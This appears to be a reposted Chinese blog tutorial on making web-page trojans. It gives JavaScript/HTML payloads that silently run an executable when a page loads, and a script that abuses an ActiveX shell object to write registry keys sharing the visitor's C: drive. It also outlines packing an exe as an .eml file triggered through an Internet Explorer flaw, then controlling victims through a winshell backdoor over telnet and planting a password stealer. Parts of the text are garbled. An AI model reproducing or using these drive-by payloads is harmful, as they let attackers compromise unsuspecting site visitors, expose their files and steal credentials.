zoukankan      html  css  js  c++  java
  • js zhi网马

     

    大家对木马都不陌生了,它可能要算是计算机病毒史上最厉害的了,相信会使木马的人千千万万,但是

    有很多人苦于怎么把木马发给对方,现在随着计算机的普及,在网络上我相信很少有人会再轻易的接收

    对方的文件了,所以网页木马诞生了。 
    1.它应该算是html带动同路径下的一个exe的文件的主页了,也就是当浏览器浏览这个页面的时候,一

    个exe的文件就在后台自动下载并执行了,可以做一个test.html的文件在桌面,内容如下: 
    <script language="javascript"> 
    run_exe="<OBJECT ID="RUNIT" WIDTH=0 HEIGHT=0 TYPE="application/x-oleobject"" 
    run_exe+="CODEBASE="test.exe#version=1,1,1,1">" 
    run_exe+="<PARAM NAME="_Version" value="65536">" 
    run_exe+="</OBJECT>" 
    run_exe+="<HTML><H1>网页加载中,请稍后....</H1></HTML>"; 
    document.open(); 
    document.clear(); 
    document.writeln(run_exe); 
    document.close(); 
    </script> 
    再在桌面下随便找个exe的文件,名字一定要改为tset.exe,好了,这时候双击我们刚才生成的html文

    件,当看到“网页加载中,请稍后....”的时候,我们的那个同路径下的exe文件也被无条件执行了,

    这种页面的优点就是编译修改简单,但是!当你申请下了一个个人主页空间的时候,把这两个文件上传

    上去的时候,当你试图通过浏览器浏览你的杰作的时候,ie的安全警告跳了出来,我想没有几个人愿意

    乖乖的冒着风险去点“是”,好了,尽管这个网页木马在本地是多么的完美,但是放到了网上就通不过

    ie的安全策略了,这个小马失败了。 
    2.是通过ie自身的漏洞写入注册表,相信很多人经常在浏览一些主页的时候,注册表被改的乱七八糟、

    ie标题被改、首页被改、注册表编辑器被禁用等等,这些都是自动修改了你的注册表的网页的杰作,所

    以我门也可以做个页面让浏览者的硬盘完全共享,也是做个html的文件,内容如下: 
    script language=javascript> 
    document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>"); 
    function f(){ 
    a1=document.applets[0]; 
    a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}"); 
    a1.createInstance(); 
    Shl = a1.GetObject(); 
    Shl.RegWrite

    ("HKLM\Software\Microsoft\Windows\CurrentVersion\Network\LanMan\RWC$\Flags",402,"R

    EG_DWORD"); 
    Shl.RegWrite

    ("HKLM\Software\Microsoft\Windows\CurrentVersion\Network\LanMan\RWC$\Type",0,"REG_

    DWORD" 
    ); 
    Shl.RegWrite

    ("HKLM\Software\Microsoft\Windows\CurrentVersion\Network\LanMan\RWC$\Path","C:\")

    ; 
    } 
    function init() 
    { 
    setTimeout("f()", 1000); 
    }

    init(); 
    </script> 
    当对方的浏览过这个页面的时候,他的c:就被共享了,共享后的进入方法嘛..呵呵不用说了吧,但是他

    虽然被共巷了,但是你还不知道谁正在看你的这个页面,他的ip又是多少你都不知道,没有关系,有个

    很简单的方法,去163申请一个域名的转换,如http://www.jdxh.com连接目标地址里...褪枪蚕砹�恿

    恕?/a> 
    这种网页木马的特点是比较安全,不宜被对方发现,但是使用麻烦需要牵扯到很多的东西。

    3.也是现在最好用的一种了吧,个人认为。它是将一个小巧的exe文件作成一个.eml的文件,再用ie的

    漏洞让一个html的页面执行这个.eml的文件,你的那个小巧的exe文件就被执行了,由于代码过长又因

    每个exe文件转换后的代码不同所以不可能一一写出,下面给出一个地http://www.jdxh.com实际上就是

    一个转...憧梢酝ü齮elnet x.x.x.x 3385来完全控制对方(这个5k的小后门是winshell5.0黑白网络有

    下,同时这个winshell5.0还有一个很出色的功能,就是能下载一个你事先设置好的指定路径下的一个

    文件,并执行他,我放置的是网络深偷,如果你的杀毒软件够厉害的话,神偷是可以被查出来的,这里

    只是实验,实际中可以指定很多查不到的小马,这里不阐述),有兴趣的朋友可以来试试。 
    这种网页木马的特点是,对方挨种率较高,除了制作麻烦一点外,没有什么缺点啦 
    好了所有的漏洞都是建立在系统漏洞的前提下,多升级多打补丁没有坏处

    最后加上一个

    <frameset rows=25%,25%,50%> 
      <frame src="frame/A.html"> 
      <frame src="frame/B.html"> 
      <frame src="frame/C.html">
    </frameset>

     
     
  • 相关阅读:
    import 和 from … import 模块的变量、方法引用差异
    python引入模块的五种方式与内置模块
    webdriver定位元素的方法和基础函数的使用
    mysql update语句 in执行效率优化
    服务器配置jupyter notebook
    安装CUDA和cuDNN
    Linux命令后台运行
    Ubuntu查看系统信息(CPU、GPU信息)
    Linux下scp用法简析
    如何解决“This app is damaged and can’t be opened. You should move it to the Trash”
  • 原文地址:https://www.cnblogs.com/alex-13/p/3254268.html
Copyright © 2011-2022 走看看